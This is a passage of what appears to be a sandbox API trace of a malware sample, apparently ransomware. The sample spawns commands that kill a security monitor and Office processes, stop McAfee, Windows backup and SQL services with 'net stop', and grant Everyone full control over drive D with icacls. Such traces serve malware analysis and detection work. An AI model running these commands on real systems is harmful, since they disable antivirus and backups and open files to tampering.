hReadPipe=0x616ef98*=0x4b0, hWritePipe=0x616ef94*=0x504) returned 1 [0149.547] GetCurrentProcess () returned 0xffffffff [0149.547] GetCurrentProcess () returned 0xffffffff [0149.547] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x4b0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x616ef9c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x616ef9c*=0x580) returned 1 [0149.547] CloseHandle (hObject=0x4b0) returned 1 [0149.547] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0149.547] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0149.547] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0149.547] CoTaskMemFree (pv=0x741d20) [0149.547] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"taskkill.exe\" /IM PccNTMon.exe /F", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x616eedc*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x504, hStdError=0x0), lpProcessInformation=0x22765a0 | out: lpCommandLine="\"taskkill.exe\" /IM PccNTMon.exe /F", lpProcessInformation=0x22765a0*(hProcess=0x5a0, hThread=0x4b0, dwProcessId=0x728, dwThreadId=0x1374)) returned 1 [0149.552] CloseHandle (hObject=0x504) returned 1 [0149.552] GetFileType (hFile=0x580) returned 0x3 [0149.552] CloseHandle (hObject=0x4b0) returned 1 [0150.433] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0150.433] CreatePipe (in: hReadPipe=0x616ef98, hWritePipe=0x616ef94, lpPipeAttributes=0x616ef18, nSize=0x0 | out: hReadPipe=0x616ef98*=0x504, hWritePipe=0x616ef94*=0x558) returned 1 [0150.433] GetCurrentProcess () returned 0xffffffff [0150.434] GetCurrentProcess () returned 0xffffffff [0150.434] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x504, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x616ef9c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x616ef9c*=0x584) returned 1 [0150.434] CloseHandle (hObject=0x504) returned 1 [0150.434] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0150.434] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0150.434] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0150.434] CoTaskMemFree (pv=0x741d20) [0150.434] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"taskkill.exe\" /IM powerpnt.exe /F", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x616eedc*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x558, hStdError=0x0), lpProcessInformation=0x2517c28 | out: lpCommandLine="\"taskkill.exe\" /IM powerpnt.exe /F", lpProcessInformation=0x2517c28*(hProcess=0x57c, hThread=0x504, dwProcessId=0x68c, dwThreadId=0xc9c)) returned 1 [0150.821] CloseHandle (hObject=0x558) returned 1 [0150.821] GetFileType (hFile=0x584) returned 0x3 [0150.821] CloseHandle (hObject=0x504) returned 1 [0151.105] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0151.105] CreatePipe (in: hReadPipe=0x616ef98, hWritePipe=0x616ef94, lpPipeAttributes=0x616ef18, nSize=0x0 | out: hReadPipe=0x616ef98*=0x504, hWritePipe=0x616ef94*=0x558) returned 1 [0151.105] GetCurrentProcess () returned 0xffffffff [0151.105] GetCurrentProcess () returned 0xffffffff [0151.105] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x504, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x616ef9c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x616ef9c*=0x5c0) returned 1 [0151.105] CloseHandle (hObject=0x504) returned 1 [0151.105] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0151.105] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0151.105] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0151.105] CoTaskMemFree (pv=0x741d20) [0151.106] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"taskkill.exe\" /IM mydesktopqos.exe /F", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x616eed4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x558, hStdError=0x0), lpProcessInformation=0x2592698 | out: lpCommandLine="\"taskkill.exe\" /IM mydesktopqos.exe /F", lpProcessInformation=0x2592698*(hProcess=0x5bc, hThread=0x504, dwProcessId=0x12f0, dwThreadId=0x1028)) returned 1 [0151.124] CloseHandle (hObject=0x558) returned 1 [0151.125] GetFileType (hFile=0x5c0) returned 0x3 [0151.125] CloseHandle (hObject=0x504) returned 1 [0151.125] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0151.125] CreatePipe (in: hReadPipe=0x616ef98, hWritePipe=0x616ef94, lpPipeAttributes=0x616ef18, nSize=0x0 | out: hReadPipe=0x616ef98*=0x504, hWritePipe=0x616ef94*=0x558) returned 1 [0151.125] GetCurrentProcess () returned 0xffffffff [0151.125] GetCurrentProcess () returned 0xffffffff [0151.125] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x504, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x616ef9c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x616ef9c*=0x5c8) returned 1 [0151.125] CloseHandle (hObject=0x504) returned 1 [0151.125] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0151.125] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0151.125] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0151.125] CoTaskMemFree (pv=0x741d20) [0151.125] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"taskkill.exe\" /IM visio.exe /F", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x616eee0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x558, hStdError=0x0), lpProcessInformation=0x25a07dc | out: lpCommandLine="\"taskkill.exe\" /IM visio.exe /F", lpProcessInformation=0x25a07dc*(hProcess=0x5c4, hThread=0x504, dwProcessId=0x1020, dwThreadId=0x1228)) returned 1 [0151.148] CloseHandle (hObject=0x558) returned 1 [0151.148] GetFileType (hFile=0x5c8) returned 0x3 [0151.148] CloseHandle (hObject=0x504) returned 1 [0151.148] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0151.149] CreatePipe (in: hReadPipe=0x616ef98, hWritePipe=0x616ef94, lpPipeAttributes=0x616ef18, nSize=0x0 | out: hReadPipe=0x616ef98*=0x504, hWritePipe=0x616ef94*=0x558) returned 1 [0151.149] GetCurrentProcess () returned 0xffffffff [0151.149] GetCurrentProcess () returned 0xffffffff [0151.149] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x504, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x616ef9c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x616ef9c*=0x5d0) returned 1 [0151.149] CloseHandle (hObject=0x504) returned 1 [0151.149] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0151.149] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0151.149] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0151.149] CoTaskMemFree (pv=0x741d20) [0151.149] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"taskkill.exe\" /IM mydesktopservice.exe /F", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x616eecc*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x558, hStdError=0x0), lpProcessInformation=0x25a40e0 | out: lpCommandLine="\"taskkill.exe\" /IM mydesktopservice.exe /F", lpProcessInformation=0x25a40e0*(hProcess=0x5cc, hThread=0x504, dwProcessId=0x1190, dwThreadId=0x158)) returned 1 [0151.160] CloseHandle (hObject=0x558) returned 1 [0151.160] GetFileType (hFile=0x5d0) returned 0x3 [0151.160] CloseHandle (hObject=0x504) returned 1 [0151.160] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0151.821] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0152.081] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0152.327] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0152.557] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0152.612] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0152.698] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0152.746] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0152.824] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0152.876] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0152.939] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0152.962] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0152.964] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0152.993] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0153.050] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0153.059] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0153.065] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0153.078] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0153.085] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0153.088] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0153.094] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0153.097] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0153.100] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0153.103] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0153.106] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0155.256] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0155.970] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0155.978] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0155.984] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0157.472] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0157.472] CreatePipe (in: hReadPipe=0x616ef98, hWritePipe=0x616ef94, lpPipeAttributes=0x616ef18, nSize=0x0 | out: hReadPipe=0x616ef98*=0x5dc, hWritePipe=0x616ef94*=0x504) returned 1 [0157.472] GetCurrentProcess () returned 0xffffffff [0157.472] GetCurrentProcess () returned 0xffffffff [0157.472] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x5dc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x616ef9c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x616ef9c*=0x4a4) returned 1 [0157.472] CloseHandle (hObject=0x5dc) returned 1 [0157.472] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0157.473] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0157.473] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0157.473] CoTaskMemFree (pv=0x741d20) [0157.473] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"icacls\" \"D:*\" /grant Everyone:F /T /C /Q", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x616eecc*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x504, hStdError=0x0), lpProcessInformation=0x2275d20 | out: lpCommandLine="\"icacls\" \"D:*\" /grant Everyone:F /T /C /Q", lpProcessInformation=0x2275d20*(hProcess=0x478, hThread=0x5dc, dwProcessId=0xec4, dwThreadId=0xc58)) returned 1 [0157.579] CloseHandle (hObject=0x504) returned 1 [0157.579] GetFileType (hFile=0x4a4) returned 0x3 [0157.579] CloseHandle (hObject=0x5dc) returned 1 [0157.591] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0157.717] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.034] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.094] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.106] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.145] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.165] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.178] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.184] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.186] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.189] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.310] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.482] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.528] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.563] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.574] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0158.585] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0178.668] CoUninitialize () Thread: id = 522 os_tid = 0x814 [0106.628] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0106.629] CoGetContextToken (in: pToken=0x63ff7b4 | out: pToken=0x63ff7b4) returned 0x0 [0106.629] IUnknown:QueryInterface (in: This=0x6ded28, riid=0x74b4d8c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x63ff7d8 | out: ppvObject=0x63ff7d8*=0x6ded34) returned 0x0 [0106.629] IComThreadingInfo:GetCurrentThreadType (in: This=0x6ded34, pThreadType=0x63ff804 | out: pThreadType=0x63ff804*=0) returned 0x0 [0106.629] IUnknown:Release (This=0x6ded34) returned 0x1 [0106.629] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x1 [0106.629] CoUninitialize () [0108.592] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0108.592] CreatePipe (in: hReadPipe=0x63ff138, hWritePipe=0x63ff134, lpPipeAttributes=0x63ff0b8, nSize=0x0 | out: hReadPipe=0x63ff138*=0x4f8, hWritePipe=0x63ff134*=0x3e0) returned 1 [0108.592] GetCurrentProcess () returned 0xffffffff [0108.592] GetCurrentProcess () returned 0xffffffff [0108.592] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x4f8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x63ff13c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x63ff13c*=0x464) returned 1 [0108.592] CloseHandle (hObject=0x4f8) returned 1 [0108.592] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0108.592] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0108.592] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0108.592] CoTaskMemFree (pv=0x741d20) [0108.592] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop mfefire /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x63ff080*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x3e0, hStdError=0x0), lpProcessInformation=0x22719a4 | out: lpCommandLine="\"net.exe\" stop mfefire /y", lpProcessInformation=0x22719a4*(hProcess=0x46c, hThread=0x4f8, dwProcessId=0x1128, dwThreadId=0x112c)) returned 1 [0109.809] CloseHandle (hObject=0x3e0) returned 1 [0109.809] GetFileType (hFile=0x464) returned 0x3 [0109.810] CloseHandle (hObject=0x4f8) returned 1 [0111.654] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0111.655] CreatePipe (in: hReadPipe=0x63ff138, hWritePipe=0x63ff134, lpPipeAttributes=0x63ff0b8, nSize=0x0 | out: hReadPipe=0x63ff138*=0x4f8, hWritePipe=0x63ff134*=0x3e0) returned 1 [0111.655] GetCurrentProcess () returned 0xffffffff [0111.655] GetCurrentProcess () returned 0xffffffff [0111.655] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x4f8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x63ff13c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x63ff13c*=0x4cc) returned 1 [0111.655] CloseHandle (hObject=0x4f8) returned 1 [0111.655] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0111.655] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0111.655] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0111.655] CoTaskMemFree (pv=0x741d20) [0111.655] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop wbengine /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x63ff080*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x3e0, hStdError=0x0), lpProcessInformation=0x24be7f0 | out: lpCommandLine="\"net.exe\" stop wbengine /y", lpProcessInformation=0x24be7f0*(hProcess=0x498, hThread=0x4f8, dwProcessId=0x11c4, dwThreadId=0x11c8)) returned 1 [0111.677] CloseHandle (hObject=0x3e0) returned 1 [0111.677] GetFileType (hFile=0x4cc) returned 0x3 [0111.678] CloseHandle (hObject=0x4f8) returned 1 [0112.590] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0112.590] CreatePipe (in: hReadPipe=0x63ff138, hWritePipe=0x63ff134, lpPipeAttributes=0x63ff0b8, nSize=0x0 | out: hReadPipe=0x63ff138*=0x4f8, hWritePipe=0x63ff134*=0x3e0) returned 1 [0112.590] GetCurrentProcess () returned 0xffffffff [0112.590] GetCurrentProcess () returned 0xffffffff [0112.590] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x4f8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x63ff13c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x63ff13c*=0x4a0) returned 1 [0112.590] CloseHandle (hObject=0x4f8) returned 1 [0112.591] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0112.591] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0112.591] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0112.591] CoTaskMemFree (pv=0x741d20) [0112.591] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop ReportServer$SQL_2008 /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x63ff070*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x3e0, hStdError=0x0), lpProcessInformation=0x24d3c80 | out: lpCommandLine="\"net.exe\" stop ReportServer$SQL_2008 /y", lpProcessInformation=0x24d3c80*(hProcess=0x49c, hThread=0x4f8, dwProcessId=0x12b0, dwThreadId=0x12b4)) returned 1 [0112.601] CloseHandle (hObject=0x3e0) returned 1 [0112.601] GetFileType (hFile=0x4a0) returned 0x3 [0112.601] CloseHandle (hObject=0x4f8) returned 1 [0115.034] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0115.034] CreatePipe (in: hReadPipe=0x63ff138, hWritePipe=0x63ff134, lpPipeAttributes=0x63ff0b8, nSize=0x0 | out: hReadPipe=0x63ff138*=0x4a4, hWritePipe=0x63ff134*=0x3e0) returned 1 [0115.034] GetCurrentProcess () returned 0xffffffff [0115.034] GetCurrentProcess () returned 0xffffffff [0115.034] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x4a4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x63ff13c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x63ff13c*=0x47c) returned 1 [0115.034] CloseHandle (hObject=0x4a4) returned 1 [0115.035] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0115.035] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0115.035] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0115.035] CoTaskMemFree (pv=0x741d20) [0115.035] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop mfemms /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x63ff080*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x3e0, hStdError=0x0), lpProcessInformation=0x2272538 | out: lpCommandLine="\"net.exe\" stop mfemms /y", lpProcessInformation=0x2272538*(hProcess=0x460, hThread=0x4a4, dwProcessId=0xaf0, dwThreadId=0xa34)) returned 1 [0115.310] CloseHandle (hObject=0x3e0) returned 1 [0115.310] GetFileType (hFile=0x47c) returned 0x3 [0115.311] CloseHandle (hObject=0x4a4) returned 1 [0116.298] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0116.298] CreatePipe (in: hReadPipe=0x63ff138, hWritePipe=0x63ff134, lpPipeAttributes=0x63ff0b8, nSize=0x0 | out: hReadPipe=0x63ff138*=0x4a4, hWritePipe=0x63ff134*=0x3e0) returned 1 [0116.299] GetCurrentProcess () returned 0xffffffff [0116.299] GetCurrentProcess () returned 0xffffffff [0116.299] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x4a4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x63ff13c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x63ff13c*=0x458) returned 1 [0116.299] CloseHandle (hObject=0x4a4) returned 1 [0116.299] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0116.299] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0116.299] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0116.299] CoTaskMemFree (pv=0x741d20) [0116.299] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop wbengine /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x63ff080*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x3e0, hStdError=0x0), lpProcessInformation=0x2674838 | out: lpCommandLine="\"net.exe\" stop wbengine /y", lpProcessInformation=0x2674838*(hProcess=0x500, hThread=0x4a4, dwProcessId=0xce8, dwThreadId=0xa80)) returned 1 [0116.557] CloseHandle (hObject=0x3e0) returned 1 [0116.557] GetFileType (hFile=0x458) returned 0x3 